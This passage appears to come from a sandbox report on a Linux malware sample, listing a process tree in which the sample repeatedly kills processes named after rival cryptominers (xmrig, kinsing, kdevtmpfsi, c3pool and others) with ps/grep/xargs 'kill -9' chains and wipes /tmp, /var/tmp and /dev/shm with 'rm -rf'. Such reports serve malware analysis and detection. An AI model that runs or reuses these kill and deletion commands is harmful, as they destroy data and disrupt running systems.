    xargs -I "%" kill -9 "%"
    3⤵
    PID:1105
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1106
- - /bin/grep
    grep -v grep
    3⤵
    PID:1107
- - /bin/grep
    grep Linux2
    3⤵
    PID:1108
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1109
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1110
- - /bin/ps
    ps aux
    3⤵
    PID:1111
- - /bin/grep
    grep -v grep
    3⤵
    PID:1112
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1113
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1114
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1115
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1116
- - /bin/grep
    grep -v grep
    3⤵
    PID:1117
- - /bin/grep
    grep kkssl
    3⤵
    PID:1118
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1119
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1120
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1121
- - /bin/grep
    grep -v grep
    3⤵
    PID:1122
- - /bin/grep
    grep cnrig
    3⤵
    PID:1123
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1124
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1125
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1126
- - /bin/grep
    grep -v grep
    3⤵
    PID:1127
- - /bin/grep
    grep stratum
    3⤵
    PID:1128
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1129
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1130
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1131
- - /bin/grep
    grep -v grep
    3⤵
    PID:1132
- - /bin/grep
    grep vscode
    3⤵
    PID:1133
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1134
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1135
- - /bin/ps
    ps aux
    3⤵
    PID:1136
- - /bin/grep
    grep -v grep
    3⤵
    PID:1137
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1138
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1139
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1140
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1141
- - /bin/grep
    grep -v grep
    3⤵
    PID:1142
- - /bin/grep
    grep xmrig
    3⤵
    PID:1143
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1144
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1145
- - /bin/ps
    ps aux
    3⤵
    PID:1146
- - /bin/grep
    grep -v grep
    3⤵
    PID:1147
- - /bin/grep
    grep c3pool
    3⤵
    PID:1148
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1149
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1150
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1151
- - /bin/grep
    grep -v grep
    3⤵
    PID:1152
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1153
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1154
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1155
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1156
- - /bin/grep
    grep -v grep
    3⤵
    PID:1157
- - /bin/grep
    grep pool
    3⤵
    PID:1158
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1159
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1160
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1161
- - /bin/grep
    grep -v grep
    3⤵
    PID:1162
- - /bin/grep
    grep dbused
    3⤵
    PID:1163
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1164
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1165
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1166
- - /bin/grep
    grep -v grep
    3⤵
    PID:1167
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1168
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1169
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1170
- - /bin/ps
    ps aux
    3⤵
    PID:1171
- - /bin/grep
    grep -v grep
    3⤵
    PID:1172
- - /bin/grep
    grep kinsing
    3⤵
    PID:1173
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1174
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1175
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1176
- - /bin/grep
    grep -v grep
    3⤵
    PID:1177
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1178
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1179
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1180
- - /bin/ps
    ps aux
    3⤵
    PID:1181
- - /bin/grep
    grep -v grep
    3⤵
    PID:1182
- - /bin/grep
    grep xmr
    3⤵
    PID:1183
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1184
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    - Reads runtime system information
    PID:1185
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1186
- - /bin/grep
    grep -v grep
    3⤵
    PID:1187
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1188
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1189
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1190
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1191
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1192
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1193
- - /bin/sleep
    sleep 3
    3⤵
    PID:1194
- - /bin/ps
    ps aux
    3⤵
    PID:1195
- - /bin/grep
    grep -v grep
    3⤵
    PID:1196
- - /bin/grep
    grep miner
    3⤵
    PID:1197
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1198
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1199
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1200
- - /bin/grep
    grep -v grep
    3⤵
    PID:1201
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1202
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1203
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1204
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1205
- - /bin/grep
    grep -v grep
    3⤵
    PID:1206
- - /bin/grep
    grep xmp
    3⤵
    PID:1207
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1208
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1209
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1210
- - /bin/grep
    grep -v grep
    3⤵
    PID:1211
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1212
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1213
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1214
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1215
- - /bin/grep
    grep -v grep
    3⤵
    PID:1216
- - /bin/grep
    grep khnug
    3⤵
    PID:1217
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1218
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1219
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1220
- - /bin/grep
    grep -v grep
    3⤵
    PID:1221
- - /bin/grep
    grep Linux2
    3⤵
    PID:1222
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1223
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1224
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1225
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1227
- - /bin/grep
    grep -v grep
    3⤵
    PID:1226
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1228
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1229
- - /bin/ps
    ps aux
    3⤵
    PID:1230
- - /bin/grep
    grep -v grep
    3⤵
    PID:1231
- - /bin/grep
    grep kkssl
    3⤵
    PID:1232
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1233
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1234
- - /bin/ps
    ps aux
    3⤵
    PID:1235
- - /bin/grep
    grep -v grep
    3⤵
    PID:1236
- - /bin/grep
    grep cnrig
    3⤵
    PID:1237
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1238
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1239
- - /bin/ps
    ps aux
    3⤵
    PID:1240
- - /bin/grep
    grep -v grep
    3⤵
    PID:1241
- - /bin/grep
    grep stratum
    3⤵
    PID:1242
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1243
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1244
- - /bin/ps
    ps aux
    3⤵
    PID:1245
- - /bin/grep
    grep -v grep
    3⤵
    PID:1246
- - /bin/grep
    grep vscode
    3⤵
    PID:1247
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1248
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1249
- - /bin/ps
    ps aux
    3⤵
    PID:1250
- - /bin/grep
    grep -v grep
    3⤵
    PID:1251
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1252
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1253
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1254
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1255
- - /bin/grep
    grep -v grep
    3⤵
    PID:1256
- - /bin/grep
    grep xmrig
    3⤵
    PID:1257
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1258
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1259
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1260
- - /bin/grep
    grep -v grep
    3⤵
    PID:1261
- - /bin/grep
    grep c3pool
    3⤵
    PID:1262
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1263
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1264
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1265
- - /bin/grep
    grep -v grep
    3⤵
    PID:1266
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1267
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1268
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1269
- - /bin/ps
    ps aux
    3⤵
    PID:1270
- - /bin/grep
    grep pool
    3⤵
    PID:1272
- - /bin/grep
    grep -v grep
    3⤵
    PID:1271
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1273
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1274
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1275
- - /bin/grep
    grep -v grep
    3⤵
    PID:1276
- - /bin/grep
    grep dbused
    3⤵
    PID:1277
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1278
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1279
- - /bin/ps
    ps aux
    3⤵
    PID:1280
- - /bin/grep
    grep -v grep
    3⤵
    PID:1281
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1282
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1283
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1284
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1285
- - /bin/grep
    grep -v grep
    3⤵
    PID:1286
- - /bin/grep
    grep kinsing
    3⤵
    PID:1287
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1288
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1289
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1290
- - /bin/grep
    grep -v grep
    3⤵
    PID:1291
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1292
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1293
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1294
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1295
- - /bin/grep
    grep -v grep
    3⤵
    PID:1296
- - /bin/grep
    grep xmr
    3⤵
    PID:1297
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1298
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1299
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1300
- - /bin/grep
    grep -v grep
    3⤵
    PID:1301
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1302
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1303
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1304
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1305
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1306
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1307
- - /bin/sleep
    sleep 3
    3⤵
    PID:1308
- - /bin/ps
    ps aux
    3⤵
    PID:1309
- - /bin/grep
    grep -v grep
    3⤵
    PID:1310
- - /bin/grep
    grep miner
    3⤵
    PID:1311
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1312
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1313
- - /bin/ps
    ps aux
    3⤵
    PID:1314
- - /bin/grep
    grep -v grep
    3⤵
    PID:1315
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1316
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1317
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1318
- - /bin/ps
    ps aux
    3⤵
    PID:1319
- - /bin/grep
    grep -v grep
    3⤵
    PID:1320
- - /bin/grep
    grep xmp
    3⤵
    PID:1321
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1322
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1323
- - /bin/ps
    ps aux
    3⤵
    PID:1324
- - /bin/grep
    grep -v grep
    3⤵
    PID:1325
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1326
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1327
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1328
- - /bin/ps
    ps aux
    3⤵
    PID:1329
- - /bin/grep
    grep -v grep
    3⤵
    PID:1330
- - /bin/grep
    grep khnug
    3⤵
    PID:1331
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1332
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1333
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1334
- - /bin/grep
    grep -v grep
    3⤵
    PID:1335
- - /bin/grep
    grep Linux2
    3⤵
    PID:1336
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1337
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1338
- - /bin/grep
    grep -v grep
    3⤵
    PID:1340
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1339
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1341
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1342
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1343
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1344
- - /bin/grep
    grep -v grep
    3⤵
    PID:1345
- - /bin/grep
    grep kkssl
    3⤵
    PID:1346
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1347
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1348
- - /bin/ps
    ps aux
    3⤵
    PID:1349
- - /bin/grep
    grep -v grep
    3⤵
    PID:1350
- - /bin/grep
    grep cnrig
    3⤵
    PID:1351
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1352
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1353
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1354
- - /bin/grep
    grep -v grep
    3⤵
    PID:1355
- - /bin/grep
    grep stratum
    3⤵
    PID:1356
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1357
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1358
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1359
- - /bin/grep
    grep -v grep
    3⤵
    PID:1360
- - /bin/grep
    grep vscode
    3⤵
    PID:1361
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1362
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1363
- - /bin/ps
    ps aux
    3⤵
    PID:1364
- - /bin/grep
    grep -v grep
    3⤵
    PID:1365
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1366
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1367
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1368
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1369
- - /bin/grep
    grep -v grep
    3⤵
    PID:1370
- - /bin/grep
    grep xmrig
    3⤵
    PID:1371
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1372
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1373
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1374
- - /bin/grep
    grep -v grep
    3⤵
    PID:1375
- - /bin/grep
    grep c3pool
    3⤵
    PID:1376
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1377
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1378
- - /bin/ps
    ps aux
    3⤵
    PID:1379
- - /bin/grep
    grep -v grep
    3⤵
    PID:1380
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1381
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1382
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1383
- - /bin/ps
    ps aux
    3⤵
    PID:1384
- - /bin/grep
    grep -v grep
    3⤵
    PID:1385
- - /bin/grep
    grep pool
    3⤵
    PID:1386
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1387
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1388
- - /bin/ps
    ps aux
    3⤵
    PID:1389
- - /bin/grep
    grep dbused
    3⤵
    PID:1391
- - /bin/grep
    grep -v grep
    3⤵
    PID:1390
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1392
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1393
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1394
- - /bin/grep
    grep -v grep
    3⤵
    PID:1395
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1396
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1397
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1398
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1399
- - /bin/grep
    grep -v grep
    3⤵
    PID:1400
- - /bin/grep
    grep kinsing
    3⤵
    PID:1401
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1402
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1403
- - /bin/ps
    ps aux
    3⤵
    PID:1404
- - /bin/grep
    grep -v grep
    3⤵
    PID:1405
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1406
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1407
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1408
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1409
- - /bin/grep
    grep -v grep
    3⤵
    PID:1410
- - /bin/grep
    grep xmr
    3⤵
    PID:1411
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1412
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1413
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1414
- - /bin/grep
    grep -v grep
    3⤵
    PID:1415
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1416
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1417
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1418
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1419
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1420
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1421
- - /bin/sleep
    sleep 3
    3⤵
    PID:1422
- - /bin/ps
    ps aux
    3⤵
    PID:1423
- - /bin/grep
    grep -v grep
    3⤵
    PID:1424
- - /bin/grep
    grep miner
    3⤵
    PID:1425
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1426
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1427
- - /bin/ps
    ps aux
    3⤵
    PID:1428
- - /bin/grep
    grep -v grep
    3⤵
    PID:1429
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1430
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1431
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1432
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1433
- - /bin/grep
    grep -v grep
    3⤵
    PID:1434
- - /bin/grep
    grep xmp
    3⤵
    PID:1435
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1436
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1437
- - /bin/ps
    ps aux
    3⤵
    PID:1438
- - /bin/grep
    grep -v grep
    3⤵
    PID:1439
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1440
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1441
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1442
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1443
- - /bin/grep
    grep -v grep
    3⤵
    PID:1444
- - /bin/grep
    grep khnug
    3⤵
    PID:1445
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1446
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1447
- - /bin/ps
    ps aux
    3⤵
    PID:1448
- - /bin/grep
    grep -v grep
    3⤵
    PID:1449
- - /bin/grep
    grep Linux2
    3⤵
    PID:1450
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1451
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1452
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1453
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1455
- - /bin/grep
    grep -v grep
    3⤵
    PID:1454
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1456
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1457
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1458
- - /bin/grep
    grep -v grep
    3⤵
    PID:1459
- - /bin/grep
    grep kkssl
    3⤵
    PID:1460
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1461
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1462
- - /bin/ps
    ps aux
    3⤵
    PID:1463
- - /bin/grep
    grep -v grep
    3⤵
    PID:1464
- - /bin/grep
    grep cnrig
    3⤵
    PID:1465
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1466
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1467
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1468
- - /bin/grep
    grep -v grep
    3⤵
    PID:1469
- - /bin/grep
    grep stratum
    3⤵
    PID:1470
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1471
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1472
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1473
- - /bin/grep
    grep -v grep
    3⤵
    PID:1474
- - /bin/grep
    grep vscode
    3⤵
    PID:1475
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1476
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1477
- - /bin/ps
    ps aux
    3⤵
    PID:1478
- - /bin/grep
    grep -v grep
    3⤵
    PID:1479
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1480
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1481
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1482
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1483
- - /bin/grep
    grep -v grep
    3⤵
    PID:1484
- - /bin/grep
    grep xmrig
    3⤵
    PID:1485
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1486
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Reads runtime system information
    PID:1487
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1488
- - /bin/grep
    grep -v grep
    3⤵
    PID:1489
- - /bin/grep
    grep c3pool
    3⤵
    PID:1490
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1491
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1492
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1493
- - /bin/grep
    grep -v grep
    3⤵
    PID:1494
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1495
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1496
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1497
- - /bin/ps
    ps aux
    3⤵
    PID:1498
- - /bin/grep
    grep -v grep
    3⤵
    PID:1499
- - /bin/grep
    grep pool
    3⤵
    PID:1500
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1501
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1502
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1503
- - /bin/grep
    grep -v grep
    3⤵
    PID:1504
- - /bin/grep
    grep dbused
    3⤵
    PID:1505
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1506
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1507
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1508
- - /bin/grep
    grep -v grep
    3⤵
    PID:1509
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1510
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1511
- - /usr/bin/xargs
